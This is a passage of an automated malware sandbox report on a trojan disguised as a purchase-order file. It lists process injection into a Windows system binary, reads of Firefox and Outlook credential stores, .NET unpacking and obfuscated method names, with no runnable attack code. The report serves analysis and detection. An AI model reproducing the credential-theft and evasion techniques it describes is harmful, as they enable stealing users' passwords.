                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045B38E06_2_045B38E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045B99506_2_045B9950
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045CB9506_2_045CB950
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04623A6C6_2_04623A6C
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04667A466_2_04667A46
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0466FA496_2_0466FA49
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0465DAC66_2_0465DAC6
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04651AA36_2_04651AA3
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0464DAAC6_2_0464DAAC
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045F5AA06_2_045F5AA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0466FB766_2_0466FB76
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04625BF06_2_04625BF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045EDBF96_2_045EDBF9
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045CFB806_2_045CFB80
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02631C306_2_02631C30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0262CAE86_2_0262CAE8
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0262CAF06_2_0262CAF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0262AE456_2_0262AE45
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0262AE506_2_0262AE50
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0262AD006_2_0262AD00
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0262CD106_2_0262CD10
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_026352C06_2_026352C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_026334D06_2_026334D0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0264B9E06_2_0264B9E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048CE7706_2_048CE770
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048CE2B46_2_048CE2B4
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048CE3D36_2_048CE3D3
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_048CD8386_2_048CD838
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: String function: 01AFEA12 appears 86 times
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: String function: 01B0F290 appears 105 times
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: String function: 01AC5130 appears 58 times
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: String function: 01AD7E54 appears 111 times
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: String function: 01A7B970 appears 280 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0461EA12 appears 86 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 045F7E54 appears 102 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0459B970 appears 279 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0462F290 appears 105 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 045E5130 appears 50 times
                Source: PO2412010.exe, 00000000.00000002.1441177729.0000000008C50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PO2412010.exe
                Source: PO2412010.exe, 00000000.00000000.1374367712.00000000001E2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebsOm.exeJ vs PO2412010.exe
                Source: PO2412010.exe, 00000000.00000002.1435053363.0000000003631000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs PO2412010.exe
                Source: PO2412010.exe, 00000000.00000002.1431476872.00000000008BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO2412010.exe
                Source: PO2412010.exe, 00000000.00000002.1435053363.0000000003679000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs PO2412010.exe
                Source: PO2412010.exe, 00000000.00000002.1435053363.0000000003679000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PO2412010.exe
                Source: PO2412010.exe, 00000000.00000002.1438950358.0000000006F70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs PO2412010.exe
                Source: PO2412010.exe, 00000003.00000002.1812197126.0000000001B7D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO2412010.exe
                Source: PO2412010.exe, 00000003.00000002.1811368240.00000000015F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameISOBURN.EXEj% vs PO2412010.exe
                Source: PO2412010.exeBinary or memory string: OriginalFilenamebsOm.exeJ vs PO2412010.exe
                Source: PO2412010.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PO2412010.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, zkasvJmNDA2aRwVk8j.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, eo2nyduXLjvfmNwJ5V.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, eo2nyduXLjvfmNwJ5V.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, eo2nyduXLjvfmNwJ5V.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, zkasvJmNDA2aRwVk8j.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, eo2nyduXLjvfmNwJ5V.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, eo2nyduXLjvfmNwJ5V.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, eo2nyduXLjvfmNwJ5V.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/1@19/12
                Source: C:\Users\user\Desktop\PO2412010.exeMutant created: NULL
                Source: C:\Users\user\Desktop\PO2412010.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                Source: C:\Windows\SysWOW64\isoburn.exeFile created: C:\Users\user\AppData\Local\Temp\l420377xJump to behavior
                Source: PO2412010.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: PO2412010.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: isoburn.exe, 00000006.00000003.1999508554.0000000002945000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2001948151.0000000002972000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1999508554.0000000002966000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3832319605.0000000002994000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3832319605.0000000002966000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PO2412010.exeReversingLabs: Detection: 36%
                Source: unknownProcess created: C:\Users\user\Desktop\PO2412010.exe "C:\Users\user\Desktop\PO2412010.exe"
                Source: C:\Users\user\Desktop\PO2412010.exeProcess created: C:\Users\user\Desktop\PO2412010.exe "C:\Users\user\Desktop\PO2412010.exe"
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeProcess created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"
                Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\PO2412010.exeProcess created: C:\Users\user\Desktop\PO2412010.exe "C:\Users\user\Desktop\PO2412010.exe"Jump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeProcess created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: PO2412010.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: PO2412010.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: PO2412010.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: isoburn.pdb source: PO2412010.exe, 00000003.00000002.1811368240.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, duvyEsVvTpq.exe, 00000005.00000002.3832925744.0000000001238000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: isoburn.pdbGCTL source: PO2412010.exe, 00000003.00000002.1811368240.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, duvyEsVvTpq.exe, 00000005.00000002.3832925744.0000000001238000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bsOm.pdb source: PO2412010.exe
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: duvyEsVvTpq.exe, 00000005.00000002.3828968792.00000000003AE000.00000002.00000001.01000000.0000000D.sdmp, duvyEsVvTpq.exe, 00000009.00000000.1877721836.00000000003AE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO2412010.exe, 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1813841964.00000000043C5000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3836401832.000000000470E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1811319300.0000000004217000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3836401832.0000000004570000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PO2412010.exe, PO2412010.exe, 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000006.00000003.1813841964.00000000043C5000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3836401832.000000000470E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1811319300.0000000004217000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3836401832.0000000004570000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: bsOm.pdbSHA256y ] source: PO2412010.exe

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, eo2nyduXLjvfmNwJ5V.cs.Net Code: cMVaApeg7l System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, eo2nyduXLjvfmNwJ5V.cs.Net Code: cMVaApeg7l System.Reflection.Assembly.Load(byte[])
                Source: PO2412010.exeStatic PE information: 0xF1A763D5 [Sun Jun 22 12:38:45 2098 UTC]
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_004148DC pushad ; retf 3_2_004148E4
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_004032C0 push eax; ret 3_2_004032C2
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_00426AB3 push es; retf 3_2_00426B5B
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_00418ABC push ebx; ret 3_2_00418ABD
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_00413BE9 push 00000025h; iretd 3_2_00413BF0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_00417C83 push edx; retf 3_2_00417CC2
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_00417D07 push edx; retf 3_2_00417CC2
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_00401DE9 pushad ; retf 3_2_00401E17
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_00404E1D push 2A89E27Eh; ret 3_2_00404E25
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_00415625 push ebp; retf 3_2_00415626
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_00404F61 push ss; ret 3_2_00404F62
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A5225F pushad ; ret 3_2_01A527F9
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A527FA pushad ; ret 3_2_01A527F9
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A809AD push ecx; mov dword ptr [esp], ecx3_2_01A809B6
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A5283D push eax; iretd 3_2_01A52858
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A5135E push eax; iretd 3_2_01A51369
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeCode function: 5_2_0318B3DC push 2A89E27Eh; ret 5_2_0318B3E4
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeCode function: 5_2_0319BBE4 push ebp; retf 5_2_0319BBE5
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeCode function: 5_2_0319E242 push edx; retf 5_2_0319E281
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeCode function: 5_2_0319E2C6 push edx; retf 5_2_0319E281
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeCode function: 5_2_031A1109 push cs; retf 5_2_031A110A
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeCode function: 5_2_0319A1A8 push 00000025h; iretd 5_2_0319A1AF
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeCode function: 5_2_0319F07B push ebx; ret 5_2_0319F07C
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeCode function: 5_2_0319F633 push ds; retf 5_2_0319F636
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeCode function: 5_2_0319AE9B pushad ; retf 5_2_0319AEA3
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeCode function: 5_2_0318B520 push ss; ret 5_2_0318B521
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeCode function: 5_2_0319F5F5 push 00000035h; iretd 5_2_0319F600
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeCode function: 5_2_031A0CE0 push ebx; ret 5_2_031A0CE1
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_045A09AD push ecx; mov dword ptr [esp], ecx6_2_045A09B6
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_026403EA push EBE9D31Fh; retf 6_2_02640403
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02640406 pushfd ; iretd 6_2_02640407
                Source: PO2412010.exeStatic PE information: section name: .text entropy: 7.62366801353489
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, DJWpZFaaRh43csYELG.csHigh entropy of concatenated method names: 'JrAcRkasvJ', 'oDAcu2aRwV', 'xkmcDUWqtk', 'XUIc4kHrD4', 'mnqcNbBfb8', 'NJLc3Jui7V', 'TveGnbjjSilV8Xdqi7', 'S09yN5e9HxQ3tMh3a2', 'KETccWcKUw', 'ttxc24eKh6'
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, oMmQCSccb6OpQA5bbGY.csHigh entropy of concatenated method names: 'J4hWyaxWv3', 'dbGWz2Q7RL', 'eQg5i9bKjn', 'ABn5cXG7rT', 'nuG5wODV9o', 'QQT52OR1Nt', 'OdW5a4tW4n', 'zWm5Ga82XQ', 'Iwd5LTXSJa', 'el95jNYmQc'
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, LJrokwwM4QkTCsbb4b.csHigh entropy of concatenated method names: 'xXOAVN7tM', 'LeX6tQcZI', 'FaPBCexoU', 'NRukmqqAF', 'qsOQXIoqO', 'ixlXJAgLk', 'DVGVfUC568pUxn3Zra', 'CBTLESIKWDdkmE69sR', 'yC8Tqo8yTpNG4riQMS', 'ixJExpR6v'
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, vXZ5P6zL2uq7GM9f0t.csHigh entropy of concatenated method names: 'YQyWB2dnj1', 'JtdWm0GGt1', 'F9EWQyrQhB', 'vC7Wfb1eJD', 'aLuWhvQ1t8', 'kNsWYQKK8N', 'gF9WV06GKx', 'GRMWtNN4LZ', 'GesWpPxQc1', 'jLwW7mfhmn'
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, zkasvJmNDA2aRwVk8j.csHigh entropy of concatenated method names: 'oWijJJc3ZM', 'lm4jeLKov9', 'XxkjbQnTpu', 'k2RjC3V8Qv', 'yBOjvPiGBu', 'L06jg0mXZh', 'bvSjHk5NPO', 'cNbj1R53qL', 'HJxjdM55G7', 'PyZjyTMubt'
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, tX5bwTJNX64dimLshW.csHigh entropy of concatenated method names: 'sf8NZV7Lap', 'UIeNKBs6om', 'UcvNJwt8US', 'zZLNeywsjW', 'EmLNhZY0Ij', 'h5BNrn3sVi', 'euNNYj2drR', 'vXqNVhp7mM', 'mSdN0lwGTV', 'sXkNTWRmB0'
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, e7DgThHAo5M1jJqJjE.csHigh entropy of concatenated method names: 'bdNqN16F5k', 'PkOqx53hcw', 'KQFqq83tQx', 'd64q5MWtga', 'g6GqlEHMxk', 'AMoqtkpPbU', 'Dispose', 'usiELCde8X', 'ISyEjUBUhB', 'abMEMTkBc9'
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, VrD4mpXWEnmZN4nqbB.csHigh entropy of concatenated method names: 'CtEUIOZ3G1', 'Mc2UkS4yvp', 'GrZMragKqL', 'lu2MYx2yAG', 'z2dMVHdpIE', 'wcZM0OCabN', 'CpCMTfTnat', 'hF5MoxBRNp', 'vA1MPMVBaX', 'Re4MZOLYU2'
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, YSbQ9sgCbheXMcCxGb.csHigh entropy of concatenated method names: 'NkOx1waPhU', 'OoIxymEOO7', 'NvKEiNtdSI', 'NSdEctaIkJ', 'gUgxSdV71G', 'YvtxKPsNAt', 'it1xsWHaEY', 'PWkxJwq9BC', 'Iswxemhscw', 'AouxbO8Dbs'
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, Npt5TpQkmUWqtk1UIk.csHigh entropy of concatenated method names: 'jQDM6jwdpo', 'i8RMBFgwJG', 'k3dMm9Zbk8', 'Y6qMQBWO3i', 'iIOMNSm0DL', 'G8EM33eQP9', 'wVvMxcuuUn', 'kr0MEkQiEi', 'Y9jMqrU5Kb', 'e2SMWKGE3x'
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, f4nhAHbJYiGSrG2I6p.csHigh entropy of concatenated method names: 'ToString', 'QIP3S8AhJ2', 'Mx13hWY8Wo', 'NBM3r3cLgn', 'WHZ3YsF9OJ', 'lxx3Vmadkt', 'YAu30DcmCC', 'hPG3Tu8E29', 'O203o7TtWp', 'DMW3PWdeLs'
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, eo2nyduXLjvfmNwJ5V.csHigh entropy of concatenated method names: 'yY92Gc6vo5', 'Qsa2L59hwk', 'IHE2jUfUpf', 'M0w2M43Npf', 'l312ULsFww', 'SUT2OLZVGJ', 'rtu2RwMdtA', 'VbD2udklSM', 'cl82nhPhjZ', 'NxT2DqbWU1'
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, iFAkaUsRUBtLyssZSC.csHigh entropy of concatenated method names: 'F9ZFmWVcyS', 'Jr1FQZVDMb', 'cYGFfnkqvB', 'jy9FhMCKxK', 'ra5FY2AOvA', 'jFhFVpwZkI', 'pi8FT80xmp', 'te8FoWntey', 'VglFZVIPYI', 'zCKFSPmV80'
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, dVqubqca8TCYZe6JayW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tHj8qrOxEK', 'fZ08WVYBLK', 'Sud85657XX', 'Jqw88cZl4l', 'qKa8ltoWu3', 'NGJ892yDtF', 'glt8tAorip'
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, v594H6dQAAaEwMEl83.csHigh entropy of concatenated method names: 'yhuqf5uJyC', 'PwVqhFijTG', 'W7DqrmI7V4', 'JhlqYYWU6l', 'zy8qVvBpPq', 'JQyq0uveEo', 'qEAqTfEA0J', 'w89qomJMow', 'FhgqP1FuOO', 'jOFqZNFmQE'
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, e20LdPPHR41HYjw2fO.csHigh entropy of concatenated method names: 'rrfRpbQWll', 'UFGR7b0oJ4', 'UfBRAcmPFd', 'zEYR6w8U8x', 'JWWRIlbnh5', 'ATrRBqxtix', 'YVURkQdAxa', 'lxxRmxkemh', 'xE3RQAdA9N', 'y55RXnOpsc'
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, mCAAJ0jneiFsUqBekx.csHigh entropy of concatenated method names: 'Dispose', 'tM1cdjJqJj', 'tRKwh5gVv0', 'ultUYyYE26', 'rBqcyAkJSf', 'cyEczt22J8', 'ProcessDialogKey', 'pXlwi594H6', 'EAAwcaEwME', 'v83ww3DnlN'
